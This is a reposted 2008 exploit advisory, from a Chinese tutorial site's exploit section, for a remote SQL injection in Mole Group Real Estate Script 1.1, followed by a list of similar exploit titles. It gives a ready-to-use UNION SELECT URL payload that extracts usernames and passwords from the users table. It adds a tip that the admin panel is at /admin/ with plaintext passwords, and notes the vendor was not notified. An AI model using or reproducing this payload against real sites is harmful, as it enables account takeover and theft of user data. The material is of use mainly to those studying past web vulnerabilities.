手机
当前位置:查字典教程网 >网络安全 >Exploit >Mole Group Real Estate Script
Mole Group Real Estate Script
摘要:-[*]==================================================================...

-[*] ================================================================================ [*]- -[*] Real Estate Script <= 1.1 Remote SQL Injection Vulnerability [*]- -[*] ================================================================================ [*]- [*] Discovered By: t0pP8uZz [*] Discovered On: 8 JULY 2008 [*] Script Download: http://www.mole-group.com/content/view/41/55/ [*] DORK: N/A [*] Vendor Has Not Been Notified! [*] DESCRIPTION: Real Estate Script from mole-group.com contains a insecure mysql query flaw, which allows a remote attacker to execute arbitrary mysql querys and gaining access to confidential information. like username, passwords, email address's etc. see below for a example. [*] SQL Injection: http://site.com/index.php?go=listings&listing_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,CONVERT(CONCAT(0x3C666F6E7420636F6C6F723D7265643E,username,0x3a,password,0x3C2F666F6E743E)/**/using/**/latin1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/FROM/**/users/**/LIMIT/**/0,1/* [*] NOTE/TIP: admin login is at /admin/ passwords are in plaintext [*] GREETZ: milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew ! [-] Peace... ...t0pP8uZz ! -[*] ================================================================================ [*]- -[*] Real Estate Script <= 1.1 Remote SQL Injection Vulnerability [*]- -[*] ================================================================================ [*]- # milw0rm.com [2008-07-08]

【Mole Group Real Estate Script】相关文章:

tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities

MojoClassifieds 2.0 Remote Blind SQL Injection Exploit

Joomla Component DT Register Remote SQL injection Vulnerability

Acoustica Mixcraft

Maian Guestbook

Dreampics Builder (page) Remote SQL Injection Vulnerability

Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

Rianxosencabos CMS 0.9 Remote Add Admin Exploit

LoveCMS 1.6.2 Final Remote Code Execution Exploit

Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

精品推荐
分类导航